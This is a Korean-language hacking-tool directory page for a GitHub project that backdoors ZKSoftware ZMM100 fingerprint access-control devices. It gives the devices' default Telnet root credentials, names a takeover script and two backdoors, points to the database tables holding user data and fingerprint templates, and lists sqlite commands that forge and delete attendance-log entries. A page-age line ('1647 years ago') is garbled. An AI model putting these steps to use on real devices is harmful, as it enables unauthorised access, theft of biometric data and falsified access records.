Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Backdooring-ZMM100-FingerPrint-Devices — AuthBypass & 자동 백도어 장치 | Kitploit
도구/GitHubGitHub/9aylas/backdooring-zmm100-fingerprint-devices
Authentication & AuthorizationEmbedded Systems SecurityPassword AttacksExploitationHardware HackingRemote Access ToolDatabase Security
GitHub9aylas/backdooring-zmm100-fingerprint-devices

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Backdooring-ZMM100-FingerPrint-Devices

AuthBypass & 자동 백도어 장치

저장소 보기
1647년 전아직 검토되지 않음

임베디드 기기 해킹 :

root@kitploit:~
Hardware platform ZMM100 :
The fingerprint access control device Made by ZKSoftware.
    • 기본 사용자/비밀번호 : root:solokey
  • 프로토콜 : Telnet (23).

스크립트 :

  • pwnit.py : 기기 해킹을 위한 자동화 도구.
  • hell : 두 번째 백도어.
  • leak-data.sh : 세 번째 백도어.

YouTube 동영상 :

이미지 대체 텍스트 https://www.youtube.com/watch?v=Zd1N0CbvR0k

루트 비밀번호 변경 :

root@kitploit:~
passwd
{ enter new root password }
cp /etc/passwd /mnt/mtdblock
cp /etc/passwd /mnt/mtdblock/data/

추가 정보 :

root@kitploit:~
This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
Web directory  "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
Database here : "/mnt/mtdblock/data/ZKDB.db"
Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10"  ( finger print data ).
-- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
-- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
-- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).

> https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
SQLite ELF File : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;

데이터 삽입/삭제 :

  • 삽입 : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"

  • 로그 삭제 : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"

대박이다 3:) !

참고 자료 :

https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.html https://github.com/linsir/pyscripts/tree/master/zkteco_check_in

도구 다운로드